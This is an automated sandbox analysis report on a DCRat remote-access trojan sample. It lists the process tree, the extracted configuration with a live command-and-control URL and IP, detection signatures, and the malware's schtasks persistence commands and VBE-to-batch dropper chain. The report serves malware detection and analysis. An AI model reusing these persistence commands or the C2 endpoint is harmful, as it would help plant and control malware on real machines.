Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
j0GOUGjcJD.exe

Overview

General Information

Sample name:j0GOUGjcJD.exe
renamed because original name is a hash value
Original sample name:2b577aea211c0031d052f521c6d5c0ec.exe
Analysis ID:1524358
MD5:2b577aea211c0031d052f521c6d5c0ec
SHA1:7cf36171d6c2dae4646132b6ebafd00bf6a38892
SHA256:acbf2913aa4a2385d29179f5a9c0add2fff6bb34adab4669d02793a5c1317cc9
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • j0GOUGjcJD.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\j0GOUGjcJD.exe" MD5: 2B577AEA211C0031D052F521C6D5C0EC)
    • wscript.exe (PID: 2936 cmdline: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontsavesbroker.exe (PID: 2332 cmdline: "C:\winSaves\fontsavesbroker.exe" MD5: 173D5AC0A5C8FBF0A3990DFD33A329B5)
          • schtasks.exe (PID: 7148 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2692 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3544 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6756 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5672 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5720 cmdline: schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6448 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7112 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fontsavesbroker.exe (PID: 4592 cmdline: "C:\winSaves\fontsavesbroker.exe" MD5: 173D5AC0A5C8FBF0A3990DFD33A329B5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"i\":\"_\",\"U\":\"|\",\"w\":\";\",\"n\":\"%\",\"Q\":\"<\",\"M\":\"~\",\"H\":\"$\",\"J\":\".\",\"O\":\"*\",\"y\":\"@\",\"a\":\"-\",\"g\":\"(\",\"0\":\" \",\"5\":\"`\",\"3\":\"!\",\"E\":\"^\",\"N\":\">\",\"k\":\"#\",\"V\":\")\",\"2\":\"&\",\"9\":\",\"}", "PCRT": "{\"D\":\"%\",\"Q\":\"`\",\"i\":\"#\",\"0\":\"&\",\"x\":\"~\",\"6\":\"(\",\"e\":\"_\",\"c\":\";\",\"M\":\">\",\"I\":\"*\",\"X\":\",\",\"=\":\".\",\"y\":\"|\",\"w\":\"-\",\"b\":\"$\",\"j\":\"<\",\"S\":\" \",\"f\":\"!\",\"p\":\")\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rkpdSgdOsmNqJJb4B3xN", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "H2": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 8 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\j0GOUGjcJD.exe", ParentImage: C:\Users\user\Desktop\j0GOUGjcJD.exe, ParentProcessId: 7000, ParentProcessName: j0GOUGjcJD.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" , ProcessId: 2936, ProcessName: wscript.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-02T17:54:09.177576+020020341941A Network Trojan was detected192.168.2.44973092.53.106.11480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-02T17:55:01.554601+020028508621Malware Command and Control Activity Detected92.53.106.11480192.168.2.452503TCP
            2024-10-02T17:57:15.352150+020028508621Malware Command and Control Activity Detected92.53.106.11480192.168.2.452527TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: j0GOUGjcJD.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\winSaves\0VySiddKAXOECI1ul.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Windows\Cursors\SearchApp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\winSaves\fontsavesbroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"i\":\"_\",\"U\":\"|\",\"w\":\";\",\"n\":\"%\",\"Q\":\"<\",\"M\":\"~\",\"H\":\"$\",\"J\":\".\",\"O\":\"*\",\"y\":\"@\",\"a\":\"-\",\"g\":\"(\",\"0\":\" \",\"5\":\"`\",\"3\":\"!\",\"E\":\"^\",\"N\":\">\",\"k\":\"#\",\"V\":\")\",\"2\":\"&\",\"9\":\",\"}", "PCRT": "{\"D\":\"%\",\"Q\":\"`\",\"i\":\"#\",\"0\":\"&\",\"x\":\"~\",\"6\":\"(\",\"e\":\"_\",\"c\":\";\",\"M\":\">\",\"I\":\"*\",\"X\":\",\",\"=\":\".\",\"y\":\"|\",\"w\":\"-\",\"b\":\"$\",\"j\":\"<\",\"S\":\" \",\"f\":\"!\",\"p\":\")\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-rkpdSgdOsmNqJJb4B3xN", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "H2": "http://ch67763.tw1.ru/@==gbJBzYuFDT", "T": "0"}
            Multi AV Scanner detection for dropped file
            Source: C:\Windows\Cursors\SearchApp.exeReversingLabs: Detection: 87%
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeReversingLabs: Detection: 87%
            Source: C:\winSaves\fontsavesbroker.exeReversingLabs: Detection: 87%
            Multi AV Scanner detection for submitted file
            Source: j0GOUGjcJD.exeReversingLabs: Detection: 73%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Machine Learning detection for dropped file
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exeJoe Sandbox ML: detected
            Source: C:\Windows\Cursors\SearchApp.exeJoe Sandbox ML: detected
            Source: C:\winSaves\fontsavesbroker.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: j0GOUGjcJD.exeJoe Sandbox ML: detected
            Source: j0GOUGjcJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: j0GOUGjcJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: j0GOUGjcJD.exe
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004DA5F4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004EB8E0
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\userJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 92.53.106.114:80
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:52503
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 92.53.106.114:80 -> 192.168.2.4:52527
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://ch67763.tw1.ru/@==gbJBzYuFDT
            Source: fontsavesbroker.exe, 00000004.00000002.1802058996.0000000002F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_004D718C
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Windows\Cursors\SearchApp.exeJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Windows\Cursors\38384e6a620884Jump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D857B0_2_004D857B
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D407E0_2_004D407E
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004FD00E0_2_004FD00E
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E70BF0_2_004E70BF
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_005011940_2_00501194
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F02F60_2_004F02F6
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D32810_2_004D3281
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DE2A00_2_004DE2A0
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E66460_2_004E6646
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F070E0_2_004F070E
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F473A0_2_004F473A
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E37C10_2_004E37C1
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D27E80_2_004D27E8
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DE8A00_2_004DE8A0
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DF9680_2_004DF968
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F49690_2_004F4969
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E6A7B0_2_004E6A7B
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E3A3C0_2_004E3A3C
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F0B430_2_004F0B43
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004FCB600_2_004FCB60
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E5C770_2_004E5C77
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E3D6D0_2_004E3D6D
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DED140_2_004DED14
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004EFDFA0_2_004EFDFA
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DDE6C0_2_004DDE6C
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004DBE130_2_004DBE13
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004F0F780_2_004F0F78
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D5F3C0_2_004D5F3C
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: String function: 004EE28C appears 35 times
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: String function: 004EE360 appears 52 times
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: String function: 004EED00 appears 31 times
            Source: fontsavesbroker.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: SearchApp.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: j0GOUGjcJD.exe, 00000000.00000003.1677033090.0000000005591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exe, 00000000.00000003.1676270763.0000000006D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exe, 00000000.00000003.1676662274.0000000007678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs j0GOUGjcJD.exe
            Source: j0GOUGjcJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, wZueKEMgkhE4fHDZjM3.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, wZueKEMgkhE4fHDZjM3.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, wZueKEMgkhE4fHDZjM3.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, wZueKEMgkhE4fHDZjM3.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ptkLbC0KAelfTu6MyGv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ptkLbC0KAelfTu6MyGv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ptkLbC0KAelfTu6MyGv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, ptkLbC0KAelfTu6MyGv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@24/12@0/0
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004D6EC9 GetLastError,FormatMessageW,0_2_004D6EC9
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCode function: 0_2_004E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_004E9E1C
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontsavesbroker.exe.logJump to behavior
            Source: C:\winSaves\fontsavesbroker.exeMutant created: NULL
            Source: C:\winSaves\fontsavesbroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\d27ed5bb774de595cac55fd063b1173b1f94783b
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
            Source: C:\winSaves\fontsavesbroker.exeFile created: C:\Users\user\AppData\Local\Temp\4ty73C4Ot0Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCommand line argument: sfxname0_2_004ED5D4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCommand line argument: sfxstime0_2_004ED5D4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCommand line argument: STARTDLG0_2_004ED5D4
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeCommand line argument: xjR0_2_004ED5D4
            Source: j0GOUGjcJD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: j0GOUGjcJD.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\winSaves\fontsavesbroker.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: j0GOUGjcJD.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeFile read: C:\Users\user\Desktop\j0GOUGjcJD.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\j0GOUGjcJD.exe "C:\Users\user\Desktop\j0GOUGjcJD.exe"
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
            Source: C:\winSaves\fontsavesbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
            Source: unknownProcess created: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"Jump to behavior
